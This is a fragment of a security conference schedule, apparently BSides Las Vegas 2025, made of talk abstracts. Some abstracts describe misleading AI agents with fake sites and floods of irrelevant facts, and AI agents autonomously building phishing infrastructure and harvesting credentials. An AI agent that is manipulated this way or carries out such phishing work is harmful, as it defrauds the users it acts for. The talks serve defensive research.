            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T104500</dtend>
            <duration>004500</duration>
            <summary>I&#x27;m A Machine, And You Should Trust Me: The Future Of Non-Human Identity</summary>
            <description>Security boils down to trust. Trusting that the code will do what is expected and is free from vulnerabilities. Trusting that the entities interacting with our data and resources have the right to access those resources. Our current approach to both human and non-human access uses the same basic flawed pattern: long-lived credentials. 

This approach to trusted access does not take into account who or what is requesting that resource. These secrets, which quite often leak, are an attacker&#x27;s best friend and are how attackers think about getting into and moving throughout your system. 

What if instead of simply asking for a security key or credential to gain access, our applications, workloads, and resources asked &quot;Who are you and how can you prove that?&quot; Humans can move towards leveraging our non-changing characteristics, like biometrics. But what about machines? Especially in the world where pods and workloads last for only hours or days? 

Attend this session to:
- Better communicate about why we must do things differently and soon
- Learn how the open-source software community has looked at addressing the identity problem
- Understand what commercial options are available
- Map a path away from the world of long-lived credentials

The future of identity and access management is the future of security, IT, and, ultimately, business resiliency.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/EKZ7ZD/</url>
            <location>Tuscany</location>
            
            <attendee>Dwayne McDaniel</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>P9MPCD@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-P9MPCD</pentabarf:event-slug>
            <pentabarf:title>The Rise of Synthetic Passwords in Botnet &amp; Attack Operations</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T110000</dtstart>
            <dtend>20250804T112000</dtend>
            <duration>002000</duration>
            <summary>The Rise of Synthetic Passwords in Botnet &amp; Attack Operations</summary>
            <description>In this talk, we explore the growing use of synthetic passwords in credential attacks, how they’re generated, and the strategic value they offer to adversaries. We&#x27;ll examine real-world examples of botnet behavior showing this shift, and how synthetic inputs are being weaponized to bypass rate limits, defeat breach matching engines, and poison log files, SIEMs and other analysis engines.

A major advantage of using synthetic passwords in attacks is to increase and exploit analysis fatigue. Large password attempts that make their way into logs and analytics - but offer little value when analyzed - create unnecessary work, processing and diversion. 

Attendees will gain insight into how to identify, profile, and defend against these noise-based attacks—using entropy analysis, anomaly scoring, and behavioral fingerprinting.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/P9MPCD/</url>
            <location>Tuscany</location>
            
            <attendee>Dimitri Fousekis</attendee>
            
            <attendee>Travis More</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>LN7ETH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-LN7ETH</pentabarf:event-slug>
            <pentabarf:title>Extending Password (in)Security to the Browser: How Malicious Browser Extensions Are Used to Steal User Passwords</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T144500</dtend>
            <duration>004500</duration>
            <summary>Extending Password (in)Security to the Browser: How Malicious Browser Extensions Are Used to Steal User Passwords</summary>
            <description>This talk has 3 main parts to it:
1.	A discussion of browser extensions as an emerging threat vector to steal identity data.
2.	A technical exploration of the methods, permissions and calls invoked by browser extensions, what data they can reach, and how they can extract password information.
3.	A discussion of how to counter these tactics, and best practices for security.

In part I, we will talk about the emergence of browser extensions as a threat surface and a risk factor. We’ll share statistics (collected by LayerX’s internal metrics from our customer base) of the distribution of browser extensions (99% of enterprise users have &gt;1 extensions, 53% of users have &gt;10 extensions), permission scope of extensions (53% of users have extensions with high/critical permissions), and data on individual permissions (such as identity, cookies, scripting, and others). We’ll also discuss how extensions become compromised: whether they are built as malicious extensions, become compromised (a-la Cyberhaven incident), or transfer ownership (via sale of extensions), and provide real-life examples of each type.

In Part II, we will proceed to a technical discussion of what types of password and authentication data extensions can access:
•	Web cookies
•	Session information
•	Application access tokens
•	Authentication certificates
•	Passwords
•	Keyboard strokes / input information

And also of the various methods for collecting this information:
•	Identity API
•	Cookies API
•	Scripting permissions
•	Tabs management permissions
•	Input method calls
•	webNavigation and webRequest APIs to control web traffic
•	and more

In Part III, we will bring these concepts together and propose a framework for auditing, assessing the risk and enforcing protection against malicious browser extensions.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/LN7ETH/</url>
            <location>Tuscany</location>
            
            <attendee>Or Eshed</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>CRQLAX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-CRQLAX</pentabarf:event-slug>
            <pentabarf:title>Hazard Analysis of Military AI Systems Using STPA-Sec: A Systems-Theoretic Approach to Secure and Assured Autonomy</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T154500</dtend>
            <duration>004500</duration>
            <summary>Hazard Analysis of Military AI Systems Using STPA-Sec: A Systems-Theoretic Approach to Secure and Assured Autonomy</summary>
            <description>As AI becomes increasingly embedded in operational workflows—across healthcare, transportation, finance, and beyond—traditional failure-mode analyses fall short. AI systems often function “correctly,” yet still produce unsafe outcomes due to flawed assumptions, incomplete control loops, or emergent behaviors. These non-failure-based hazards are especially critical when AI outputs shape human decisions or operate under loose oversight.

This session presents an applied case study using System-Theoretic Process Analysis for Security (STPA-Sec) to analyze a representative AI decision-support system integrating generative and predictive components. We model the system’s control structure—including users, data flows, models, and feedback mechanisms—to identify unsafe control actions such as:
- AI-generated outputs that bypass validation
- Feedback delays in time-sensitive scenarios
- Interface design failures that erode operator trust

Each hazard is traced to causal factors like model misalignment, lack of context awareness, and missing constraints on AI autonomy. We then demonstrate how to implement effective controls—such as human-on-the-loop (HOTL) oversight, system boundaries, and enriched operator feedback—to reduce residual risk.

This talk is grounded in real-world analysis and provides attendees with a repeatable method for anticipating and mitigating systemic AI failures—especially valuable for those involved in AI risk, governance, or security.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/CRQLAX/</url>
            <location>Tuscany</location>
            
            <attendee>Josh Harguess</attendee>
            
            <attendee>Chris Ward</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JCZVM7@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JCZVM7</pentabarf:event-slug>
            <pentabarf:title>The HMAC Trap: Security or Illusion?</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T174500</dtend>
            <duration>004500</duration>
            <summary>The HMAC Trap: Security or Illusion?</summary>
            <description>This talk is the result of deep-dive research into HMAC vulnerabilities, misconfigurations, implementation flaws, and security failures that have led to authentication bypasses and exploited systems. HMAC is one of the most widely used cryptographic primitives in modern authentication, securing APIs, JWTs, and message integrity across countless applications. However, as my research has shown, it&#x27;s also frequently misunderstood and misused in ways that introduce serious security risks.

I have explored multiple vulnerabilities in real-world HMAC implementations and analyzed how subtle mistakes can lead to authentication failures. This talk will focus on breaking down these weaknesses through pre-recorded demos, code reviews, and attack scenarios, all using open-source tools such as Python’s HMAC module, hash-extension attacks, and other exploitation techniques.

Tools &amp; Resources:
•	GitHub repo with PoC code and demos: https://github.com/HexxedBitHeadz/02-17-HMAC 
•	Python scripts for HMAC validation testing
•	Custom Flask-based vulnerable app for exploitation demos
•	Blog reference: https://hexxedbitheadz.com/unraveling-the-cryptographic-thread-of-hmac/ 
•	OWASP cheat sheets – used for contrasting secure vs. flawed HMAC usage: https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html
https://cheatsheetseries.owasp.org/cheatsheets/Microservices_Security_Cheat_Sheet.html</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JCZVM7/</url>
            <location>Tuscany</location>
            
            <attendee>Marluan &quot;Izzny&quot; Cleary</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7HLURD@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7HLURD</pentabarf:event-slug>
            <pentabarf:title>Machine Identity &amp; Attack Path: The Danger of Misconfigurations</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T180000</dtstart>
            <dtend>20250804T184500</dtend>
            <duration>004500</duration>
            <summary>Machine Identity &amp; Attack Path: The Danger of Misconfigurations</summary>
            <description>In today’s rapidly advancing digital environment, securing multi-cloud infrastructures has become more crucial than ever. &quot;Machine Identity &amp; Attack Path: The Danger of Misconfigurations&quot; addresses the complexities and emerging threats inherent in managing multi-cloud setups. This talk will equip attendees with comprehensive insights into how attackers leverage vulnerabilities caused by misconfigured security protocols and the improper handling of machine identities.

The session begins by laying out fundamental concepts such as machine identity, attack vectors, surfaces, and paths, clarifying how each element contributes to potential security breaches. Participants will gain a thorough understanding of attack paths, crucial for tracking potential attack routes within cloud environments.

Leveraging graph-based visualization tools, like SecBridge, Cartography, and AWSPX, this presentation will demonstrate how to map complex environments and visualize access permissions effectively. This approach not only aids in understanding potential vulnerabilities but also strengthens security postures across different cloud platforms.

The discussion extends to cloud-specific attacks, identifying typical vulnerabilities within AWS, OCI, GCP, and Azure. Attendees will be guided through mitigation strategies using best practices and the latest open-source tools to secure multi-cloud architectures effectively.

This talk is vital for cybersecurity professionals, cloud architects, and IT managers aiming to safeguard their organizations&#x27; digital assets. Explore innovative strategies to address the critical security needs of today’s multi-cloud ecosystems and ensure robust defense mechanisms in these dynamic environments.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7HLURD/</url>
            <location>Tuscany</location>
            
            <attendee>Filipi Pires</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZCTLHZ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZCTLHZ</pentabarf:event-slug>
            <pentabarf:title>“PEBKAC Rebooted: A Hacker’s Guide to People‑Patching in 90 Days”</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T102000</dtend>
            <duration>002000</duration>
            <summary>“PEBKAC Rebooted: A Hacker’s Guide to People‑Patching in 90 Days”</summary>
            <description>For decades, security pros have repeated the mantra: “People are the weakest link.” 

This talk flips that myth on its head. Using one of the largest datasets of its kind—1 million users, millions of phishing simulations, and survey responses from 170,000 people — we’ll explore how people aren’t the biggest problem in cybersecurity. They’re the greatest opportunity.

Human error is not random. It follows predictable patterns hardwired by evolution:

Optimism bias: “It won’t happen to me.” (+37% click rate)

Anchoring bias: First impressions override logic (now supercharged by GenAI-quality phish)

Dunning-Kruger effect: Overconfidence after shallow training = dangerous false certainty

Technology bias: 1 in 3 users believe firewalls and antivirus fully protect them—a belief that leads to 140% more clicks

These aren’t theoretical concepts. They show up in real phishing telemetry. People don’t click because they’re dumb—they click because their brains are conserving energy, operating on autopilot, or hijacked by emotional triggers like urgency and fear. Nearly 20% of clickers don’t even remember doing it. Another 17% say they were rushing. The amygdala moves faster than logic. Social engineers know this. It&#x27;s time defenders did too.

The good news? These patterns are hackable—by us.

Backed by behavioral science and data, this talk outlines a new model of human defense: one based on motivation, emotional learning, and cognitive bias mitigation. It also introduces SCARF, a neuroscience-based model (Status, Certainty, Autonomy, Relatedness, Fairness) - a concept from the business world into cybersecurity - that helps us engage users on their terms—not ours.

We’ll cover what actually works:

Click rates drop 8x in 90 days with well-designed simulation programs
Report rates increase 2.5–3x when users get positive feedback and real-time coaching
Live phishing threats caught by users increase as trust in tools alone declines
Resilience decays fast: pause simulations for three months and click rates double
We’ll also explore failure modes: over-training leads to false confidence, and phishing users too often (more than once a month) tanks performance.

This session will give you a blueprint for building adaptive, motivated human firewalls using neuroscience, behavior modeling, and just the right dose of gamified reinforcement. Learn how to measure attitudes—not just knowledge—and why motivation is the real missing link in most security awareness programs.

Don’t settle for blaming users. Hack their biases. Trigger better defaults. Close the loop with feedback, not shame.

From weakest link to fastest sensor: this is how you patch the wetware.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZCTLHZ/</url>
            <location>Siena</location>
            
            <attendee>David Shipley</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JZ98SA@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JZ98SA</pentabarf:event-slug>
            <pentabarf:title>Autonomous Discovery of Logic-based API Vulnerabilities</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend>20250804T111500</dtend>
            <duration>004500</duration>
            <summary>Autonomous Discovery of Logic-based API Vulnerabilities</summary>
            <description>The content of this talk originated from a research project Dvir Lazar and I developed at Carnegie Mellon this past year. Following our research, Dvir and I co-founded Alkonos, an AI-based Dynamic Application Security Testing (DAST) startup.
The fundamental problem we&#x27;re addressing is that current DAST tools widely adopted by both industry and hacker communities rely on pattern matching for known vulnerabilities or fuzzing without contextual insights. This approach renders them completely ineffective against some of the most critical web application security vulnerabilities, including IDORs, access control vulnerabilities, and account takeovers. According to OWASP, access control vulnerabilities are ranked as the #1 most critical vulnerability, yet traditional tools consistently fail to detect them.
Recent advancements in AI offer the potential to automate the detection of these complex vulnerabilities. However, as with any emerging technology, significant challenges remain. Our research revealed that while multiple companies and academic research efforts are tackling this field, there&#x27;s no standardized way to measure the success of these tools. We argue that without proper benchmarks, the hacker community cannot effectively assess these solutions, and the industry lacks direction for developing robust automation tools.
To address this gap, we&#x27;ve developed Marvin, an MIT-licensed benchmark suite specifically designed to evaluate whether autonomous agents can discover logic bugs in realistic environments. Marvin provides standardized vulnerability scenarios with ground-truth labels, focusing on business logic flaws where AI systems traditionally struggle to understand application context and business rules.
Our framework features diverse application vulnerability corpora across multiple API paradigms (REST, GraphQL), controlled noise elements to test false positive rates, varied authentication mechanisms, and progressive difficulty tiers. We&#x27;ll demonstrate how reinforcement learning-based hackbots can be trained on Marvin to successfully identify these vulnerabilities and present a live demonstration of our RL agent navigating complex API structures and exploiting business logic flaws that traditional security tools miss.
This talk will cover our approach to training and evaluating AI-based security testing systems, introduce the Marvin framework to the hacker community, and present a roadmap for advancing automated detection of logic-based vulnerabilities. We&#x27;ll also discuss how the community can contribute to and utilize Marvin to evaluate vendor claims about AI-based security tools.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JZ98SA/</url>
            <location>Siena</location>
            
            <attendee>Dvir Lazar</attendee>
            
            <attendee>Taha Biyikli</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>89TETH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-89TETH</pentabarf:event-slug>
            <pentabarf:title>Fragmentation of CTI: The Deck is Stacked Against the Defenders</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T144500</dtend>
            <duration>004500</duration>
            <summary>Fragmentation of CTI: The Deck is Stacked Against the Defenders</summary>
            <description>In pursuing its business, Centripetal has become one of the largest commercial consumers of intelligence in the world.  In the spirit of giving back to the community, our Labs research team conducts analysis of this data to provide valuable insights to publish in peer-reviewed academic journals and to share freely with trusted cybersecurity communities - no marketing fluff.  This topic is one such endeavour.

The cybersecurity industry emphasizes that CTI is a pivotal component to every cyber defense strategy.  CTI has grown to be a $14B industry where the vast majority of critical information about threats are in closed-source, commercial offerings from over 300 providers world-wide.  The market claims typically state a uniqueness factor of up to 80% with each provider touting the breadth, depth and speed of their intelligence as competitive advantages over their peers.  However, we have yet to find any independent comprehensive competitive analysis to validate or refute those claims.  A small number of peer-reviewed articles on this subject matter are dated and limited mostly to open source intelligence and a few commercial sources.  But more importantly, any such validation of the uniqueness claim would lead to an obvious conclusion that few seem to acknowledge: if every provider’s data is unique, no single provider can offer complete or even majority coverage for known threats.

We will begin this session with an overview of the CTI ecosystem including the estimated number of total commercial, open source and government/NGO providers, then dive into a comprehensive overlap analysis of threat indicator data that reveals the true overlap to be between 1-5% depending on fidelity.  We will then look at the threat categories of each provider to show their specializations that contribute to the lack of duplicity as well as the ~16% conflicting data that can lead to confusion in threat investigations.

We will then explore coverage graphs from retrospective analysis of published CVEs from 2023 and 2024 to show a 6-12 day delay in CTI attributions to those vulnerabilities.  We will delve into a historical prediction analysis of unpublished threats that show nearly a 100% coverage of attack infrastructure used to exploit newly published CVEs more than 3-7 days in advance of such publications.  This coverage is still respectable at 55% more than 90 days in advance.

The impact of these observations and conclusions may be profound.  The tried-and-true approach of leveraging a handful of high quality open source, government and commercial intelligence in a sophisticated SOC may fail not because of poor operations but rather simply because of insufficient data.  The overemphasis of the need for confidence and depth in CTI may be contributing to delayed attribution and widening the window of opportunity for attackers who can scale exploit attempts within hours of disclosure.  Something must change, and that change can begin with the knowledge of what you didn’t know.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/89TETH/</url>
            <location>Siena</location>
            
            <attendee>Dave Ahn</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>WMZJTT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-WMZJTT</pentabarf:event-slug>
            <pentabarf:title>Human Attack Surfaces in Agentic Web: How I Learned to Stop Worrying and Love the AI Apocalypse</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T154500</dtend>
            <duration>004500</duration>
            <summary>Human Attack Surfaces in Agentic Web: How I Learned to Stop Worrying and Love the AI Apocalypse</summary>
            <description>The rise of AI agents is rapidly transforming the digital landscape into a terrifying new reality. We are entering the age of the Agentic Web, a vast and interconnected ecosystem where AI-driven agents autonomously handle tasks and interact with online services on behalf of human users. While these innovations promise efficiency and personalization, they also come with dark, potentially catastrophic risks that could reshape the way we interact with the web—and each other.
In this talk, we will dive deep into the Agentic Web, exploring how AI agents are transforming nearly every facet of our digital lives and the emerging security threats they bring with them. From their rapid adoption to the vulnerabilities that lie within their structure, we’ll take a closer look at how these agents will fundamentally alter the online environment and, with it, our sense of privacy, security, and trust.
1. Introducing the Agentic Web
We begin by setting the stage with a relevant news story, showcasing just how rapidly AI agents are infiltrating our daily lives. With tools like Large Language Models (LLMs) already transforming search engines and digital assistants, AI agents are poised to take over tasks that were once firmly in the human domain. From shopping for goods to finding a job or even navigating relationships, AI agents are rapidly becoming our intermediaries, acting on our behalf in ways we never imagined.
AI Agents vs. LLMs
It’s important to understand where AI agents overlap with LLMs and how they complement one another. While LLMs like GPT-4 revolutionized natural language processing, AI agents are designed to go beyond conversation—they autonomously make decisions and carry out tasks, learning from their interactions to improve over time.
At their core, AI agents rely on a cognitive agent architecture, allowing them to perceive their environment, react to stimuli, and pursue specific goals without constant human intervention. But what makes these agents so powerful also makes them vulnerable—acting independently and autonomously in a world filled with deception, they become prime targets for manipulation.
The Agentic Web
As we transition to the Agentic Web, we explore a world where AI agents not only perform tasks but also interact with each other across digital ecosystems. This interconnected web allows agents to negotiate with vendors, find the best prices, and manage everything from travel bookings to job applications. The ease with which users can delegate tasks will enhance user experience, but it also introduces significant risks—agents may act on behalf of their users without their knowledge, opening a vast array of new vulnerabilities.
Key Aspects of the Agentic Web
Autonomy: AI agents operate without requiring constant input, making decisions based on user preferences or environmental data.
Perception and Reactivity: These agents can sense their surroundings and respond in real-time.
Learning and Goal-Oriented Behavior: Agents can adapt and evolve, continuously improving their efficiency.
Collaboration: Agents can work together, sharing information to complete complex tasks, such as coordinating multiple agents to solve a problem.
The Agentic Web represents a shift from traditional internet interaction. No longer will users directly engage with websites and services; instead, AI agents will take over, autonomously managing interactions with the web and even each other.
Applications and Use Cases
This shift is already happening. AI agents are significantly impacting industries like customer service, healthcare, and cybersecurity. For example, AI agents in customer service can handle queries autonomously, while in cybersecurity, they are used to detect and respond to threats in real-time. The implications are far-reaching, from autonomous vehicles to virtual personal assistants handling every aspect of our digital lives.
Looking toward the future, we see AI agents revolutionizing e-commerce, job seeking, dating, and even academic placements, creating a digital landscape where tasks are no longer controlled by humans, but by a network of interconnected agents, each with its own goals and capabilities.
2. Agentic Web Risks
With the rise of AI agents comes an entirely new set of risks, particularly for the users who place their trust in them. As AI agents take on more responsibility, the potential for security vulnerabilities grows exponentially. AI agents’ ability to perform tasks autonomously makes them prime targets for manipulation and exploitation.
Risks to Human Users
Users are at the forefront of this shift, and their security is at risk. Research shows that people will overtrust AI agents, opening the door to manipulation. Whether through fake AI workers or dark patterns designed to deceive, the Agentic Web will be rife with new types of cyber threats.

Dark Patterns: AI agents, with their natural language interfaces, are highly susceptible to manipulation through social engineering attacks. This includes everything from subtle biases in decision-making to outright harmful behavior encouraged by malicious actors.
Risks to Agents
AI agents themselves are not immune to threats. Just as users are targeted, agents can fall victim to countermeasures and manipulation. Cybercriminals may craft attacks specifically designed to exploit the vulnerabilities in these autonomous systems, using deceptive tactics like synthetic media and deepfake social engineering to trick agents into carrying out malicious actions.
One example of this is the “maze of irrelevant facts” technique, where malicious actors overwhelm an AI agent with misleading information, causing it to make faulty decisions. This emerging threat shows how AI agents could be used as weapons in the digital arms race, a race that is only just beginning.
3. Mitigations to Agentic Web Risks
As AI agents become more prevalent, it’s crucial to establish frameworks and security models to protect both users and agents. Know Your Agent (KYA) and MAESTRO (Multi-Agent Environment, Security, Threat, Risk, and Outcome) are two key frameworks that can help identify vulnerabilities and create proactive security measures for this emerging landscape.
Additionally, threat modeling strategies like STRIDE—which focuses on threats like spoofing, tampering, and information disclosure—will be essential for understanding and mitigating the risks posed by the Agentic Web. Ensuring least privilege for agents, where they only have access to the resources they need, will also be critical in reducing potential damage from exploited agents.
4. What the Future Holds
As we look ahead, the adoption of AI agents will continue to accelerate. The economic incentives driving their adoption will force businesses and consumers to adapt quickly. In the retail space, we are already seeing how AI agents could reshape e-commerce, leading to an arms race between buyer bots and seller bots. This could create a situation where only those with access to AI agents will succeed in securing limited offers or low prices.
Likely Near-Horizon Scenarios
What should security professionals be thinking about right now? As AI agents become more ubiquitous, cybercriminals will shift their focus from targeting humans to targeting AI agents directly. This could lead to Neo Social Engineering attacks where attackers manipulate agents rather than individuals. Just as traders have become reliant on algorithms from the rise of high frequency trading, users may come to depend on agents, only to see their trust exploited by attackers who have already tricked the AI systems they rely on.
Further, we may see the rise of fraudulent e-commerce sites designed to deceive AI agents into recommending fake products or services. This could further erode user trust and privacy, especially as personal data becomes concentrated within the agents managing our digital lives. If these agents are compromised, the damage to individual privacy could be devastating.
Conclusion
The future of the Agentic Web is both exciting and terrifying. As AI agents become more embedded in our daily lives, the risks associated with their use will grow exponentially. The need for robust security measures and vigilance has never been greater. This is not a distant concern—it is the near-future reality of the digital world we are rapidly building. Security professionals must act now to understand these risks, develop mitigation strategies, and prepare for a new era where AI agents will become central players in our digital ecosystem.
What are the implications of a web where the agents of AI, rather than humans, hold the reins? The future of cybersecurity will depend on the answers.

WORK CITED
ANP (Agent Network Protocol)
https://agentnetworkprotocol.com/en/

Canham, M. &amp; Sawyer, B.D. (2023). Me and My Evil Digital Twin: The Psychology of Human Exploitation by AI Assistants.
https://www.youtube.com/watch?v=qjhfWWEQCgQ 
 
Canham, M. (2021). Deepfake Social Engineering: Creating a Framework for Synthetic Media Social Engineering. Black Hat USA 2021
https://www.youtube.com/watch?v=2yILTfBV974  

Chaffer, T. J. (2025). Know Your Agent: Governing AI Identity on the Agentic Web.
https://ssrn.com/abstract=5162127
https://dx.doi.org/10.2139/ssrn.5162127 

Edwards, B. (2025). Cloudflare turns AI against itself with endless maze of irrelevant facts
https://arstechnica.com/ai/2025/03/cloudflare-turns-ai-against-itself-with-endless-maze-of-irrelevant-facts/

Huang, K. (2025). Agentic AI Threat Modeling Framework: MAESTRO
https://cloudsecurityalliance.org/blog/2025/02/06/agentic-ai-threat-modeling-framework-maestro# 
https://archive.is/TTP1D 

Kran et al. (2025). DarkBench: Benchmarking Dark Patterns in Large Language Models
https://openreview.net/pdf?id=odjMSBSWRt 
https://darkbench.ai/

MCP (Model Context Protocol)
https://modelcontextprotocol.io/introduction

Milne, S. (2024). AI tools show biases in ranking job applicants’ names according to perceived race and gender
https://www.washington.edu/news/2024/10/31/ai-bias-resume-screening-race-gender/#:~:text=the%20process%20%E2%80%94%20are%20now,automation%20in%20their%20hiring%20process 
https://archive.is/Yy1h3 

Nichols, S. (2025). AI-enabled phishing and fake worker attacks on the rise
https://www.scworld.com/perspective/deepseek-breach-yet-again-sheds-light-on-ai-dangers 
https://archive.is/BTW2C 

Rance, G. (2025). DeepSeek breach yet again sheds light on AI dangers
https://www.scworld.com/news/ai-enabled-phishing-and-fake-worker-attacks-on-the-rise 
https://archive.is/VhjnO 

Shostack, A. (2014). Threat Modeling: Designing for Security. Wiley. 
https://www.wiley.com/en-us/Threat+Modeling%3A+Designing+for+Security-p-9781118809990</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/WMZJTT/</url>
            <location>Siena</location>
            
            <attendee>Matthew Canham</attendee>
            
            <attendee>Unnamed speaker</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JBXWUF@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JBXWUF</pentabarf:event-slug>
            <pentabarf:title>Automating Phishing Infrastructure Development Using AI Agents</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend></dtend>
            <duration>004500</duration>
            <summary>Automating Phishing Infrastructure Development Using AI Agents</summary>
            <description>While much attention has been given to how large language models (LLMs) can craft convincing phishing emails, less focus has been placed on how these models can automate the underlying infrastructure of phishing campaigns. This talk presents new research demonstrating how modern AI agents—powered by both frontier and open-source models such as GPT-4o, Claude Sonnet, and DeepSeek—can autonomously register domains, configure DNS records, deploy spoofed landing pages, and harvest credentials, often with minimal human oversight.

We systematically evaluate these capabilities across a range of agentic tasks, measuring success by task completion rate, time and cost efficiency, level of human intervention required, and evasion of registrar and DNS-level defenses. By comparing fully autonomous runs with human-in-the-loop processes, we offer a detailed look at where automation currently excels—and where it still encounters friction.

Our findings suggest that phishing infrastructure, once a manual and resource-intensive process, is becoming increasingly scalable and accessible through AI. We conclude with key implications for defenders, including updated technical countermeasures, coordination strategies with registrars and hosting providers, and policy recommendations to address the growing misuse potential of advanced language models. We believe this talk will resonate with the BSides community as it highlights the often overlooked (but essential) backend components that enable phishing attacks.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JBXWUF/</url>
            <location>Siena</location>
            
            <attendee>Fred Heiding</attendee>
            
            <attendee>Simon Lermen</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>R83DQJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-R83DQJ</pentabarf:event-slug>
            <pentabarf:title>Securing AI Infrastructure: Lessons from National Cybersecurity Strategies and Attacks Against Other Critical Sectors</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T180000</dtstart>
            <dtend>20250804T184500</dtend>
            <duration>004500</duration>
            <summary>Securing AI Infrastructure: Lessons from National Cybersecurity Strategies and Attacks Against Other Critical Sectors</summary>
